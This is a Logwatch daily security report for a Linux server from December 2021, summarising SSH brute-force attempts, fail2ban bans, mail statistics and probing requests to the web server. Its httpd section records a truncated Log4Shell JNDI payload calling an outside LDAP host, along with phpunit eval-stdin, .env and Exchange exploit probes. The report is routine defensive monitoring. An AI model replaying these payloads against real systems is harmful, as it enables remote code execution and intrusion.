[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

Montag, 13 Dezember 2021


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Mon Dec 13 04:42:05 2021
        Date Range Processed: yesterday
                              ( 2021-Dec-12 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [ 22:22 ]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 Connection attempts using mod_proxy:
    123.171.247.39 -> zapf.wiki:443: 1 Time(s)
    45.148.10.241 -> zapf.wiki:443: 1 Time(s)
    45.81.235.112 -> 45.81.235.214:4444: 2 Time(s)
    45.93.250.148 -> 45.81.235.214:4444: 1 Time(s)
 
 A total of 7 sites probed the server 
    161.35.230.183
    167.172.163.245
    167.71.102.181
    193.169.253.168
    222.186.19.235
    223.149.20.71
    43.128.204.243
 
 Requests with error response codes
    400 Bad Request
       null: 8 Time(s)
       mstshash=Administr: 6 Time(s)
       /: 3 Time(s)
       45.81.235.214:4444: 3 Time(s)
       http://fuwu.sogou.com/404/index.html: 2 Time(s)
       mstshash=Domain: 2 Time(s)
       zapf.wiki:443: 2 Time(s)
       &\xB7xM\xC1\xE2\xF2u5\xD3\x96\x1E\xD8i=1\x ... x09\xC0\x13\xC0: 1 Time(s)
       /aaa9: 1 Time(s)
       /aab9: 1 Time(s)
       /ab2g: 1 Time(s)
       /ab2h: 1 Time(s)
       /config/getuser?index=0: 1 Time(s)
       /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... LordAJVcFe3AAAf: 1 Time(s)
       /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
       10\x05J~uTz\x84\x12_O\xC4FJ\xBD\xD9\xC9w\x ... x09\xC0\x13\xC0: 1 Time(s)
       \x8A\x94\x81\xF9\xA0\xE5: 1 Time(s)
       \xBF\x02\x00\x88\x13\x00\x00\x87\x00\x00\x ... 0\x00/\x9E\x16E: 1 Time(s)
       icap://icap-server.net/server?arg=87: 1 Time(s)
       z\xA8F\x199\xD0t\xE38\x8BP\xDB\x9CC1_LU\xC ... x09\xC0\x14\xC0: 1 Time(s)
    404 Not Found
       /: 1 Time(s)
       /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
    499 (undefined)
       /: 4 Time(s)
    500 Internal Server Error
       /: 16 Time(s)
       /.env: 4 Time(s)
       /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
       /?x=${jndi:ldap://45.155.205.233:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
       /aaa9: 1 Time(s)
       /aab9: 1 Time(s)
       /actuator/health: 1 Time(s)
       /console/: 1 Time(s)
       /ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
       /favicon.ico: 1 Time(s)
       /mifs/.;/services/LogService: 1 Time(s)
       /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       root (58.246.125.198): 39 Time(s)
       root (061093240018.static.ctinets.com): 33 Time(s)
       root (183.131.74.242): 28 Time(s)
       root (101.34.136.222): 27 Time(s)
       root (42.159.80.91): 19 Time(s)
       unknown (183.131.74.242): 19 Time(s)
       unknown (061093240018.static.ctinets.com): 17 Time(s)
       root (183.82.7.11): 16 Time(s)
       root (r167-61-52-250.dialup.adsl.anteldata.net.uy): 12 Time(s)
       unknown (101.34.136.222): 11 Time(s)
       unknown (58.246.125.198): 11 Time(s)
       root (45.114.192.154): 10 Time(s)
       root (119.96.175.156): 9 Time(s)
       unknown (42.159.80.91): 9 Time(s)
       root (204.44.68.125): 7 Time(s)
       unknown (119.96.175.156): 7 Time(s)
       unknown (183.82.7.11): 7 Time(s)
       unknown (193.169.254.138): 4 Time(s)
       unknown (45.114.192.154): 4 Time(s)
       root (103.93.17.149): 3 Time(s)
       root (112.216.157.26): 3 Time(s)
       root (193.169.254.138): 3 Time(s)
       unknown (112.216.157.26): 3 Time(s)
       unknown (204.44.68.125): 3 Time(s)
       unknown (211.45.247.122): 3 Time(s)
       unknown (120.157.16.17): 2 Time(s)
       unknown (175.210.240.51): 2 Time(s)
       unknown (179.43.187.37): 2 Time(s)
       unknown (220.74.0.120): 2 Time(s)
       root (103.254.198.67): 1 Time(s)
       root (161.35.205.46): 1 Time(s)
       root (164.90.203.55): 1 Time(s)
       root (2.56.57.186): 1 Time(s)
       root (211.45.247.122): 1 Time(s)
       root (45.88.137.253): 1 Time(s)
       unknown (1.215.195.10): 1 Time(s)
       unknown (134.236.247.145): 1 Time(s)
       unknown (141.98.10.82): 1 Time(s)
       unknown (146.185.79.101): 1 Time(s)
       unknown (oc-144-21-87-42.compute.oraclecloud.com): 1 Time(s)
       www-data (183.131.74.242): 1 Time(s)
    Invalid Users:
       Unknown Account: 111 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

   15.502K  Bytes accepted                              15,874
   15.502K  Bytes sent via SMTP                         15,874
 ========   ==================================================
 
        1   Accepted                                   100.00%
 --------   --------------------------------------------------
        1   Total                                      100.00%
 ========   ==================================================
 
        1   4xx Reject relay denied                    100.00%
 --------   --------------------------------------------------
        1   Total 4xx Rejects                          100.00%
 ========   ==================================================
 
       16   Connections             
        6   Connections lost (inbound) 
       16   Disconnections          
        1   Removed from queue      
        1   Sent via SMTP           
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Failed logins from:
    2.56.57.186: 1 time
    42.159.80.91: 19 times
    45.88.137.253: 1 time
    45.114.192.154 (154-192-114-45.intechonline.net): 10 times
    58.246.125.198: 39 times
    61.93.240.18 (061093240018.static.ctinets.com): 33 times
    101.34.136.222: 27 times
    103.93.17.149 (web1.acmepadm.com): 3 times
    103.254.198.67: 1 time
    112.216.157.26: 3 times
    119.96.175.156: 9 times
    161.35.205.46: 1 time
    164.90.203.55: 1 time
    167.61.52.250 (r167-61-52-250.dialup.adsl.anteldata.net.uy): 12 times
    183.82.7.11 (183.82.7.11.actcorp.in): 16 times
    183.131.74.242: 29 times
    193.169.254.138: 3 times
    204.44.68.125 (204.44.68.125.static.quadranet.com): 7 times
    211.45.247.122: 1 time
 
 Illegal users from:
    2001:470:1:c84::23: 1 time
    undef: 79 times
    1.215.195.10: 1 time
    42.159.80.91: 9 times
    45.114.192.154 (154-192-114-45.intechonline.net): 4 times
    58.246.125.198: 11 times
    61.93.240.18 (061093240018.static.ctinets.com): 17 times
    65.49.20.69 (scan-20.shadowserver.org): 1 time
    101.34.136.222: 11 times
    112.216.157.26: 3 times
    119.96.175.156: 7 times
    120.157.16.17: 2 times
    134.236.247.145: 1 time
    141.98.10.82: 1 time
    144.21.87.42 (oc-144-21-87-42.compute.oraclecloud.com): 1 time
    146.185.79.101: 1 time
    175.210.240.51: 2 times
    179.43.187.37: 2 times
    183.82.7.11 (183.82.7.11.actcorp.in): 7 times
    183.131.74.242: 19 times
    193.169.254.138: 4 times
    204.44.68.125 (204.44.68.125.static.quadranet.com): 3 times
    211.45.247.122: 3 times
    220.74.0.120: 2 times
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem         Size  Used Avail Use% Mounted on
 /dev/ploop33257p1  394G  242G  132G  65% /
 none               4.0G     0  4.0G   0% /dev
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

[TOPF] Logwatch for h2361197.stratoserver.net (Linux)